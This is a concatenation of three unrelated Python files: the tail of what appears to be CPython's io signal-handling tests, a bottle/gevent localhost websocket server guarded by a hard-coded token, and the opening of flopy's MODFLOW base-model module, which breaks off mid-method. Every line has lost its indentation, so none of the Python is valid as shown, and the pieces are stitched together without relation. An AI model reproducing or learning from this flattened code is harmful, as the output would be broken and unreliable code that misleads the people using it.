invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
# Issue #22331: The test hangs on FreeBSD 7.2
@support.requires_freebsd_version(8)
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
server.py
|
from pathlib import Path
from zipfile import ZipFile
from util import unfuck_pythonw
import sys
import os
import logging
import bottle
import json
import gevent
import gevent.queue
import gevent.pywsgi
import gevent.threadpool
import multiprocessing
from geventwebsocket import WebSocketError
import geventwebsocket
import geventwebsocket.websocket
from geventwebsocket.handler import WebSocketHandler
from geventwebsocket.logging import create_logger
import contextlib
try:
import webview
use_webview = True
except ImportError:
use_webview = False
import app
def start(port=0):
multiprocessing.set_start_method('spawn')
bottle.debug(True)
bottle_app = bottle.Bottle()
logger = create_logger('geventwebsocket.logging')
logger.setLevel(logging.DEBUG)
logger.addHandler(logging.StreamHandler())
logger.propagate = False
if app.app_archive:
zf = ZipFile(app.app_archive, 'r')
print(zf.namelist())
print(zf.getinfo('webgui2/dist/index.html'))
def serve_file(path):
try:
print('serving', path, 'from', 'webgui2/dist/' + path)
info = zf.getinfo('webgui2/dist/' + path)
if info.is_dir():
return bottle.HTTPError(403)
size = info.file_size
bottle.response.content_length = size
bottle.response.content_type = bottle.mimetypes.guess_type(path)[0]
return zf.open(info, 'r')
except KeyError:
return bottle.HTTPError(404)
except:
import traceback
traceback.print_exc()
else:
root = Path(__file__).parent.joinpath('dist')
def serve_file(path):
return bottle.static_file(path, root)
httpsock = gevent.socket.socket(gevent.socket.AF_INET, gevent.socket.SOCK_STREAM)
httpsock.bind(('127.0.0.1', port))
httpsock.listen()
token = '1145141919'
@bottle_app.route("/")
def serve_root():
return serve_file("index.html")
@bottle_app.route('/itemimg/<name>.png')
def itemimg(name):
logger.info('serving file %s', name)
import imgreco.itemdb
imgreco.itemdb.update_extra_items()
items = imgreco.itemdb.all_known_items
itemres = items.get(name, None)
if itemres:
bottle.response.content_type = 'image/png'
return itemres.open()
else:
return 404
def readws(ws):
while True:
try:
msg = ws.receive()
except WebSocketError:
return None
if msg is not None:
if not isinstance(msg, str):
continue
try:
obj = json.loads(msg)
except:
logger.error("invalid JSON")
continue
logger.debug("received request %r", obj)
return obj
else:
return None
@bottle_app.route("/ws")
def rpc_endpoint():
wsock : geventwebsocket.websocket.WebSocket = bottle.request.environ.get('wsgi.websocket')
if not wsock:
bottle.abort(400, 'Expected WebSocket request.')
authorized = False
wsock.send('{"type":"need-authorize"}')
while True:
try:
obj = readws(wsock)
if obj is None:
break
request_type = obj.get('type', None)
if request_type == 'web:authorize':
client_token = obj.get('token', None)
if client_token == token:
authorized = True
break
except WebSocketError:
break
if authorized:
logger.info('client authorized')
from .worker_launcher import worker_process
inq = multiprocessing.Queue()
outq = multiprocessing.Queue()
p = multiprocessing.Process(target=worker_process, args=(inq, outq), daemon=True)
logger.info('spawning worker process')
p.start()
pool : gevent.threadpool.ThreadPool = gevent.get_hub().threadpool
error = False
logger.info('starting worker loop')
outqread = pool.spawn(outq.get)
wsread = gevent.spawn(readws, wsock)
while not error:
for task in gevent.wait((outqread, wsread), count=1):
if task is outqread:
try:
outval = outqread.get()
except:
logger.error('read worker output failed with exception', exc_info=True)
error = True
break
gevent.spawn(wsock.send, json.dumps(outval))
outqread = pool.spawn(outq.get)
elif task is wsread:
try:
obj = wsread.get()
except:
logger.error('read message from websocket failed with exception', exc_info=True)
error = True
break
if obj is None:
error = True
break
wsread = gevent.spawn(readws, wsock)
pool.spawn(inq.put, obj)
logger.info('worker loop stopped')
with contextlib.suppress(Exception):
gevent.kill(wsread)
wsock.close()
inq.put_nowait(None)
p.kill()
@bottle_app.route("/<filepath:path>")
def serve_static(filepath):
return serve_file(filepath)
group = gevent.pool.Pool()
server = gevent.pywsgi.WSGIServer(httpsock, bottle_app, handler_class=WebSocketHandler, log=logger, spawn=group)
url = f'http://{server.address[0]}:{server.address[1]}/?token={token}'
print(url)
server_task = gevent.spawn(server.serve_forever)
if port != 0:
server_task.get()
return
from .webhost import get_host
host = get_host()
host.start(url, 1080, 820)
if host.wait_handle:
# neither gevent nor pywebview like non-main thread
webview_task = gevent.get_hub().threadpool.spawn(host.wait_handle)
webview_task.wait()
else:
idlechk_interval = getattr(host, 'poll_interval', 60)
idlecount = 1
while True:
gevent.sleep(idlechk_interval)
if len(group) == 0:
idlecount += 1
else:
idlecount = 0
if idlecount >= 3:
print("stopping idle server")
break
# gevent.util.print_run_info()
server.stop()
if __name__ == '__main__':
start()
|
mbase.py
|
"""
mbase module
This module contains the base model class from which
all of the other models inherit from.
"""
from __future__ import print_function
import abc
import sys
import os
import shutil
import threading
import warnings
import queue as Queue
from datetime import datetime
from shutil import which
from subprocess import Popen, PIPE, STDOUT
import copy
import numpy as np
from flopy import utils, discretization
from .version import __version__
from .discretization.modeltime import ModelTime
from .discretization.grid import Grid
# Global variables
iconst = 1 # Multiplier for individual array elements in integer and real arrays read by MODFLOW's U2DREL, U1DREL and U2DINT.
iprn = -1 # Printout flag. If >= 0 then array values read are printed in listing file.
class FileDataEntry(object):
def __init__(self, fname, unit, binflag=False, output=False, package=None):
self.fname = fname
self.unit = unit
self.binflag = binflag
self.output = output
self.package = package
class FileData(object):
def __init__(self):
self.file_data = []
return
def add_file(self, fname, unit, binflag=False, output=False, package=None):
ipop = []
for idx, file_data in enumerate(self.file_data):
if file_data.fname == fname or file_data.unit == unit:
ipop.append(idx)
self.file_data.append(FileDataEntry(fname, unit, binflag=binflag,
output=output, package=package))
return
class ModelInterface(object):
def __init__(self):
self._mg_resync = True
self._modelgrid = None
def update_modelgrid(self):
if self._modelgrid is not None:
self._modelgrid = Grid(proj4=self._modelgrid.proj4,
xoff=self._modelgrid.xoffset,
yoff=self._modelgrid.yoffset,
angrot=self._modelgrid.angrot)
self._mg_resync = True
@property
@abc.abstractmethod
def modelgrid(self):
raise NotImplementedError(
'must define modelgrid in child '
'class to use this base class')
@property
@abc.abstractmethod
def packagelist(self):
raise NotImplementedError(
'must define packagelist in child '
'class to use this base class')
@property
@abc.abstractmethod
def namefile(self):
raise NotImplementedError(
'must define namefile in child '
'class to use this base class')
@property
@abc.abstractmethod
def model_ws(self):
raise NotImplementedError(
'must define model_ws in child '
'class to use this base class')
@property
@abc.abstractmethod
def exename(self):
raise NotImplementedError(
'must define exename in child '
'class to use this base class')
@property
@abc.abstractmethod
def version(self):
raise NotImplementedError(
'must define version in child '
'class to use this base class')
@property
@abc.abstractmethod
def solver_tols(self):
raise NotImplementedError(
'must define version in child '
'class to use this base class')
@abc.abstractmethod
def export(self, f, **kwargs):
raise NotImplementedError(
'must define export in child '
'class to use this base class')
@property
@abc.abstractmethod
def laytyp(self):
raise NotImplementedError(
'must define laytyp in child '
'class to use this base class')
@property
@abc.abstractmethod
def hdry(self):
raise NotImplementedError(
'must define hdry in child '
'class to use this base class')
@property
@abc.abstractmethod
def hnoflo(self):
raise NotImplementedError(
'must define hnoflo in child '
'class to use this base class')
@property
@abc.abstractmethod
def laycbd(self):
raise NotImplementedError(
'must define laycbd in child '
'class to use this base class')
@property
@abc.abstractmethod
def verbose(self):
raise NotImplementedError(
'must define verbose in child '
'class to use this base class')
@abc.abstractmethod
def check(self, f=None, verbose=True, level=1):
raise NotImplementedError(
'must define check in child '
'class to use this base class')
def get_package_list(self, ftype=None):
"""
Get a list of all the package names.
Parameters
----------
ftype : str
Type of package, 'RIV', 'LPF', etc.
Returns
-------
val : list of strings
Can be used to see what packages are in the model, and can then
be used with get_package to pull out individual packages.
"""
val = []
for pp in (self.packagelist):
if ftype is None:
val.append(pp.name[0].upper())
elif pp.package_type.lower() == ftype:
val.append(pp.name[0].upper())
return val
def _check(self, chk, level=1):
"""
Check model data for common errors.
Parameters
----------
f : str or file handle
String defining file name or file handle for summary file
of check method output. If a string is passed a file handle
is created. If f is None, check method does not write
results to a summary file. (default is None)
verbose : bool
Boolean flag used to determine if check method results are
written to the screen
level : int
Check method analysis level. If level=0, summary checks are
performed. If level=1, full checks are performed.
summarize : bool
Boolean flag used to determine if summary of results is written
to the screen
Returns
-------
None
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow.load('model.nam')
>>> m.check()
"""
# check instance for model-level check
results = {}
for p in self.packagelist:
if chk.package_check_levels.get(p.name[0].lower(), 0) <= level:
results[p.name[0]] = p.check(f=None, verbose=False,
level=level - 1,
checktype=chk.__class__)
# model level checks
# solver check
if self.version in chk.solver_packages.keys():
solvers = set(chk.solver_packages[self.version]).intersection(
set(self.get_package_list()))
if not solvers:
chk._add_to_summary('Error', desc='\r No solver package',
package='model')
elif len(list(solvers)) > 1:
for s in solvers:
chk._add_to_summary('Error',
desc='\r Multiple solver packages',
package=s)
else:
chk.passed.append('Compatible solver package')
# add package check results to model level check summary
for r in results.values():
if r is not None and r.summary_array is not None: # currently SFR doesn't have one
chk.summary_array = np.append(chk.summary_array,
r.summary_array).view(
np.recarray)
chk.passed += ['{} package: {}'.format(r.package.name[0], psd)
for psd in r.passed]
chk.summarize()
return chk
class BaseModel(ModelInterface):
"""
MODFLOW based models base class
Parameters
----------
modelname : string
Name of the model. Model files will be given this name. (default is
'modflowtest'
namefile_ext : string
name file extension (default is 'nam')
exe_name : string
name of the modflow executable
model_ws : string
Path to the model workspace. Model files will be created in this
directory. Default is None, in which case model_ws is assigned
to the current working directory.
"""
def __init__(self, modelname='modflowtest', namefile_ext='nam',
exe_name='mf2k.exe', model_ws=None,
structured=True, verbose=False, **kwargs):
"""
BaseModel init
"""
ModelInterface.__init__(self)
self.__name = modelname
self.namefile_ext = namefile_ext or ''
self._namefile = self.__name + '.' + self.namefile_ext
self._packagelist = []
self.heading = ''
self.exe_name = exe_name
self._verbose = verbose
self.external_path = None
self.external_extension = 'ref'
if model_ws is None: model_ws = os.getcwd()
if not os.path.exists(model_ws):
try:
os.makedirs(model_ws)
except:
print(
'\n{0:s} not valid, workspace-folder was changed to {1:s}\n'.format(
model_ws, os.getcwd()))
model_ws = os.getcwd()
self._model_ws = model_ws
self.structured = structured
self.pop_key_list = []
self.cl_params = ''
# check for reference info in kwargs
# we are just carrying these until a dis package is added
xll = kwargs.pop("xll", None)
yll = kwargs.pop("yll", None)
self._xul = kwargs.pop("xul", None)
self._yul = kwargs.pop("yul", None)
if self._xul is not None or self._yul is not None:
warnings.warn('xul/yul have been deprecated. Use xll/yll instead.',
DeprecationWarning)
self._rotation = kwargs.pop("rotation", 0.0)
self._proj4_str = kwargs.pop("proj4_str", None)
self._start_datetime = kwargs.pop("start_datetime", "1-1-1970")
# build model discretization objects
self._modelgrid = Grid(proj4=self._proj4_str, xoff=xll, yoff=yll,
angrot=self._rotation)
self._modeltime = None
# Model file information
self.__onunit__ = 10
# external option stuff
self.array_free_format = True
self.free_format_input = True
self.parameter_load = False
self.array_format = None
self.external_fnames = []
self.external_units = []
self.external_binflag = []
self.external_output = []
self.package_units = []
self._next_ext_unit = None
# output files
self.output_fnames = []
self.output_units = []
self.output_binflag = []
self.output_packages = []
return
@property
def modeltime(self):
raise NotImplementedError(
'must define modeltime in child '
'class to use this base class')
@property
def modelgrid(self):
raise NotImplementedError(
'must define modelgrid in child '
'class to use this base class')
@property
def packagelist(self):
return self._packagelist
@packagelist.setter
def packagelist(self, packagelist):
self._packagelist = packagelist
@property
def namefile(self):
return self._namefile
@namefile.setter
def namefile(self, namefile):
self._namefile = namefile
@property
def model_ws(self):
return self._model_ws
@model_ws.setter
def model_ws(self, model_ws):
self._model_ws = model_ws
@property
def exename(self):
return self._exename
@exename.setter
def exename(self, exename):
self._exename = exename
@property
def version(self):
return self._version
@version.setter
def version(self, version):
self._version = version
@property
def verbose(self):
return self._verbose
@verbose.setter
def verbose(self, verbose):
self._verbose = verbose
@property
def laytyp(self):
if self.get_package("LPF") is not None:
return self.get_package("LPF").laytyp.array
if self.get_package("BCF6") is not None:
return self.get_package("BCF6").laycon.array
if self.get_package("UPW") is not None:
return self.get_package("UPW").laytyp.array
return None
@property
def hdry(self):
if self.get_package("LPF") is not None:
return self.get_package("LPF").hdry
if self.get_package("BCF6") is not None:
return self.get_package("BCF6").hdry
if self.get_package("UPW") is not None:
return self.get_package("UPW").hdry
return None
@property
def hnoflo(self):
try:
bas6 = self.get_package("BAS6")
return bas6.hnoflo
except AttributeError:
return None
@property
def laycbd(self):
try:
dis = self.get_package("DIS")
return dis.laycbd.array
except AttributeError:
return None
# we don't need these - no need for controlled access to array_free_format
# def set_free_format(self, value=True):
# """
# Set the free format flag for the model instance
#
# Parameters
# ----------
# value : bool
# Boolean value to set free format flag for model. (default is True)
#
# Returns
# -------
#
# """
# if not isinstance(value, bool):
# print('Error: set_free_format passed value must be a boolean')
# return False
# self.array_free_format = value
#
# def get_free_format(self):
# """
# Return the free format flag for the model
#
# Returns
# -------
# out : bool
# Free format flag for the model
#
# """
# return self.array_free_format
def next_unit(self, i=None):
if i is not None:
self.__onunit__ = i - 1
else:
self.__onunit__ += 1
return self.__onunit__
def next_ext_unit(self):
"""
Function to encapsulate next_ext_unit attribute
"""
next_unit = self._next_ext_unit + 1
self._next_ext_unit += 1
return next_unit
def export(self, f, **kwargs):
"""
Method to export a model to netcdf or shapefile based on the
extension of the file name (.shp for shapefile, .nc for netcdf)
Parameters
----------
f : str
filename
kwargs : keyword arguments
modelgrid : flopy.discretization.Grid instance
user supplied modelgrid which can be used for exporting
in lieu of the modelgrid associated with the model object
Returns
-------
None or Netcdf object
"""
from .export import utils
return utils.model_export(f, self, **kwargs)
def add_package(self, p):
"""
Add a package.
Parameters
----------
p : Package object
"""
for idx, u in enumerate(p.unit_number):
if u != 0:
if u in self.package_units or u in self.external_units:
try:
pn = p.name[idx]
except:
pn = p.name
if self.verbose:
msg = "\nWARNING:\n unit {} ".format(u) + \
"of package {} ".format(pn) + \
"already in use."
print(msg)
self.package_units.append(u)
for i, pp in enumerate(self.packagelist):
if pp.allowDuplicates:
continue
elif isinstance(p, type(pp)):
if self.verbose:
print("\nWARNING:\n Two packages of the same type, " +
"Replacing existing " +
"'{}' package.".format(p.name[0]))
self.packagelist[i] = p
return
if self.verbose:
print('adding Package: ', p.name[0])
self.packagelist.append(p)
def remove_package(self, pname):
"""
Remove a package from this model
Parameters
----------
pname : string
Name of the package, such as 'RIV', 'BAS6', etc.
"""
for i, pp in enumerate(self.packagelist):
if pname.upper() in pp.name:
if self.verbose:
print('removing Package: ', pp.name)
# Remove the package object from the model's packagelist
p = self.packagelist.pop(i)
# Remove the package unit number from the list of package
# units stored with the model
for iu in p.unit_number:
if iu in self.package_units:
self.package_units.remove(iu)
return
raise StopIteration(
'Package name ' + pname + ' not found in Package list')
def __getattr__(self, item):
"""
__getattr__ - syntactic sugar
Parameters
----------
item : str
3 character package name (case insensitive) or "sr" to access
the SpatialReference instance of the ModflowDis object
Returns
-------
sr : SpatialReference instance
pp : Package object
Package object of type :class:`flopy.pakbase.Package`
Note
----
if self.dis is not None, then the spatial reference instance is updated
using self.dis.delr, self.dis.delc, and self.dis.lenuni before being
returned
"""
if item == 'output_packages' or not hasattr(self, 'output_packages'):
raise AttributeError(item)
if item == 'sr':
if self.dis is not None:
return self.dis.sr
else:
return None
if item == 'tr':
if self.dis is not None:
return self.dis.tr
else:
return None
if item == "start_datetime":
if self.dis is not None:
return self.dis.start_datetime
else:
return None
# return self.get_package(item)
# to avoid infinite recursion
if item == "_packagelist" or item == "packagelist":
raise AttributeError(item)
pckg = self.get_package(item)
if pckg is not None or item in self.mfnam_packages:
return pckg
if item == 'modelgrid':
return
raise AttributeError(item)
def get_ext_dict_attr(self, ext_unit_dict=None, unit=None, filetype=None,
pop_key=True):
iu = None
fname = None
if ext_unit_dict is not None:
for key, value in ext_unit_dict.items():
if key == unit:
iu = key
fname = os.path.basename(value.filename)
break
elif value.filetype == filetype:
iu = key
fname = os.path.basename(value.filename)
if pop_key:
self.add_pop_key_list(iu)
break
return iu, fname
def _output_msg(self, i, add=True):
if add:
txt1 = 'Adding'
txt2 = 'to'
else:
txt1 = 'Removing'
txt2 = 'from'
msg = '{} {} '.format(txt1, self.output_fnames[i]) + \
'(unit={}) '.format(self.output_units[i]) + \
'{} the output list.'.format(txt2)
print(msg)
def add_output_file(self, unit, fname=None, extension='cbc',
binflag=True, package=None):
"""
Add an ascii or binary output file for a package
Parameters
----------
unit : int
unit number of external array
fname : str
filename of external array. (default is None)
extension : str
extension to use for the cell-by-cell file. Only used if fname
is None. (default is cbc)
binflag : bool
boolean flag indicating if the output file is a binary file.
Default is True
package : str
string that defines the package the output file is attached to.
Default is None
"""
add_cbc = False
if unit > 0:
add_cbc = True
# determine if the file is in external_units
if abs(unit) in self.external_units:
idx = self.external_units.index(abs(unit))
if fname is None:
fname = os.path.basename(self.external_fnames[idx])
binflag = self.external_binflag[idx]
self.remove_external(unit=abs(unit))
# determine if the unit exists in the output data
if abs(unit) in self.output_units:
add_cbc = False
idx = self.output_units.index(abs(unit))
# determine if binflag has changed
if binflag is not self.output_binflag[idx]:
add_cbc = True
if add_cbc:
self.remove_output(unit=abs(unit))
else:
if package is not None:
self.output_packages[idx].append(package)
if add_cbc:
if fname is None:
fname = self.name + '.' + extension
# check if this file name exists for a different unit number
if fname in self.output_fnames:
idx = self.output_fnames.index(fname)
iut = self.output_units[idx]
if iut != unit:
# include unit number in fname if package has
# not been passed
if package is None:
fname = self.name + '.{}.'.format(unit) \
+ extension
# include package name in fname
else:
fname = self.name + '.{}.'.format(package) \
+ extension
else:
fname = os.path.basename(fname)
self.add_output(fname, unit, binflag=binflag, package=package)
return
def add_output(self, fname, unit, binflag=False, package=None):
"""
Assign an external array so that it will be listed as a DATA or
DATA(BINARY) entry in the name file. This will allow an outside
file package to refer to it.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
binflag : boolean
binary or not. (default is False)
"""
if fname in self.output_fnames:
if self.verbose:
msg = "BaseModel.add_output() warning: " + \
"replacing existing filename {}".format(fname)
print(msg)
idx = self.output_fnames.index(fname)
if self.verbose:
self._output_msg(idx, add=False)
self.output_fnames.pop(idx)
self.output_units.pop(idx)
self.output_binflag.pop(idx)
self.output_packages.pop(idx)
self.output_fnames.append(fname)
self.output_units.append(unit)
self.output_binflag.append(binflag)
if package is not None:
self.output_packages.append([package])
else:
self.output_packages.append([])
if self.verbose:
self._output_msg(-1, add=True)
return
def remove_output(self, fname=None, unit=None):
"""
Remove an output file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
if self.verbose:
self._output_msg(i, add=False)
self.output_fnames.pop(i)
self.output_units.pop(i)
self.output_binflag.pop(i)
self.output_packages.pop(i)
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
if self.verbose:
self._output_msg(i, add=False)
self.output_fnames.pop(i)
self.output_units.pop(i)
self.output_binflag.pop(i)
self.output_packages.pop(i)
else:
msg = ' either fname or unit must be passed to remove_output()'
raise Exception(msg)
return
def get_output(self, fname=None, unit=None):
"""
Get an output file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
return self.output_units[i]
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
return self.output_fnames[i]
return None
else:
msg = ' either fname or unit must be passed to get_output()'
raise Exception(msg)
return
def set_output_attribute(self, fname=None, unit=None, attr=None):
"""
Set a variable in an output file from the model by specifying either
the file name or the unit number and a dictionary with attributes
to change.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
idx = None
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
idx = i
break
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
idx = i
break
else:
msg = ' either fname or unit must be passed ' + \
' to set_output_attribute()'
raise Exception(msg)
if attr is not None:
if idx is not None:
for key, value in attr.items:
if key == 'binflag':
self.output_binflag[idx] = value
elif key == 'fname':
self.output_fnames[idx] = value
elif key == 'unit':
self.output_units[idx] = value
return
def get_output_attribute(self, fname=None, unit=None, attr=None):
"""
Get a attribute for an output file from the model by specifying either
the file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
idx = None
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
idx = i
break
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
idx = i
break
else:
raise Exception(
' either fname or unit must be passed ' +
' to set_output_attribute()')
v = None
if attr is not None:
if idx is not None:
if attr == 'binflag':
v = self.output_binflag[idx]
elif attr == 'fname':
v = self.output_fnames[idx]
elif attr == 'unit':
v = self.output_units[idx]
return v
def add_external(self, fname, unit, binflag=False, output=False):
"""
Assign an external array so that it will be listed as a DATA or
DATA(BINARY) entry in the name file. This will allow an outside
file package to refer to it.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
binflag : boolean
binary or not. (default is False)
"""
if fname in self.external_fnames:
if self.verbose:
msg = "BaseModel.add_external() warning: " + \
"replacing existing filename {}".format(fname)
print(msg)
idx = self.external_fnames.index(fname)
self.external_fnames.pop(idx)
self.external_units.pop(idx)
self.external_binflag.pop(idx)
self.external_output.pop(idx)
if unit in self.external_units:
if self.verbose:
msg = "BaseModel.add_external() warning: " + \
"replacing existing unit {}".format(unit)
print(msg)
idx = self.external_units.index(unit)
self.external_fnames.pop(idx)
self.external_units.pop(idx)
self.external_binflag.pop(idx)
self.external_output.pop(idx)
self.external_fnames.append(fname)
self.external_units.append(unit)
self.external_binflag.append(binflag)
self.external_output.append(output)
return
def remove_external(self, fname=None, unit=None):
"""
Remove an external file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
"""
plist = []
if fname is not None:
for i, e in enumerate(self.external_fnames):
if fname in e:
plist.append(i)
elif unit is not None:
for i, u in enumerate(self.external_units):
if u == unit:
plist.append(i)
else:
msg = ' either fname or unit must be passed to remove_external()'
raise Exception(msg)
# remove external file
j = 0
for i in plist:
ipos = i - j
self.external_fnames.pop(ipos)
self.external_units.pop(ipos)
self.external_binflag.pop(ipos)
self.external_output.pop(ipos)
j += 1
return
def add_existing_package(self, filename, ptype=None,
copy_to_model_ws=True):
"""
Add an existing package to a model instance.
Parameters
----------
filename : str
the name of the file to add as a package
ptype : optional
the model package type (e.g. "lpf", "wel", etc). If None,
then the file extension of the filename arg is used
copy_to_model_ws : bool
flag to copy the package file into the model_ws directory.
Returns
-------
None
"""
if ptype is None:
ptype = filename.split('.')[-1]
ptype = str(ptype).upper()
# for pak in self.packagelist:
# if ptype in pak.name:
# print("BaseModel.add_existing_package() warning: " +\
# "replacing existing package {0}".format(ptype))
class Obj(object):
pass
fake_package = Obj()
fake_package.write_file = lambda: None
fake_package.extra = ['']
fake_package.name = [ptype]
fake_package.extension = [filename.split('.')[-1]]
fake_package.unit_number = [self.next_ext_unit()]
if copy_to_model_ws:
base_filename = os.path.split(filename)[-1]
fake_package.file_name = [base_filename]
shutil.copy2(filename, os.path.join(self.model_ws, base_filename))
else:
fake_package.file_name = [filename]
fake_package.allowDuplicates = True
self.add_package(fake_package)
def get_name_file_entries(self):
"""
Get a string representation of the name file.
Parameters
----------
"""
lines = []
for p in self.packagelist:
